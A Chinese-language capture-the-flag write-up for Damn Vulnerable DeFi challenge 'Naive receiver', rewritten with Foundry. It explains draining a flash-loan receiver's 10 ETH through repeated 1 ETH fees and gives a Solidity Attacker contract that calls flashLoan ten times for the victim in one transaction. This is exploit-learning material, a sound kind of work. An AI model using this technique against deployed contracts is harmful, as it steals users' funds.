Challenge #2 - Naive receiver#
为了系统的学习 solidity 和 foundry,我基于 foundry 测试框架重新编写 damnvulnerable-defi 的题解,欢迎交流和共建~🎉
合约#
- NaiveReceiverLenderPool:继承 IERC3156FlashLender,提供闪电贷功能
- FlashLoanReceiver:继承 IERC3156FlashBorrower,用于发起闪电贷接收回调
脚本#
- 部署 NaiveReceiverLenderPool 合约,向 pool 中转入 1000eth,pool 的闪电贷手续费为 1eth
- 部署 FlashLoanReceiver 合约,向 receiver 中转入 10eth
- 执行攻击脚本
- 期望 receiver 中的余额为 0,pool 中的余额为 1000+10eth
题解#
攻击目标是使得 receiver 中的余额为空,因为每次通过 pool 执行闪电贷都需要 1eth 的手续费,因此只需通过 receiver 向 pool 执行十次闪电贷即可把 10eth 全部通过手续费的方式转给 pool
根据题目要求,尽量在一笔交易完成,因此可以编写合约在一笔交易中完成十次闪电贷
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "../../src/naive-receiver/FlashLoanReceiver.sol";
import "../../src/naive-receiver/NaiveReceiverLenderPool.sol";
import "openzeppelin-contracts/contracts/interfaces/IERC3156FlashBorrower.sol";
contract Attacker {
constructor(address payable _pool, address payable _receiver){
NaiveReceiverLenderPool pool = NaiveReceiverLenderPool(_pool);
for(uint256 i=0; i<10; i++){
pool.flashLoan(IERC3156FlashBorrower(_receiver), address(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), 1, "0x");
}
}
}